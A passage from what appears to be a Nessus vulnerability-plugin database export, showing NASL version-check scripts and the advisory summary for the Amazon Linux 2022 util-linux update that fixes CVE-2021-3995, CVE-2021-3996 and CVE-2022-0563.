'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 
'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel 
/ etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-15T15:07:32", "description": "The remote Amazon Linux 2022 host is affected by multiple vulnerabilities as referenced in the ALAS2022-2022-099 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. 
(CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-06T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : (ALAS2022-2022-099)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-099.NASL", "href": "https://www.tenable.com/plugins/nessus/164772", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-099.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164772);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2022 : (ALAS2022-2022-099)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-099 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. 
(CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-099.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update --releasever=2022.0.20220628 util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 
'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 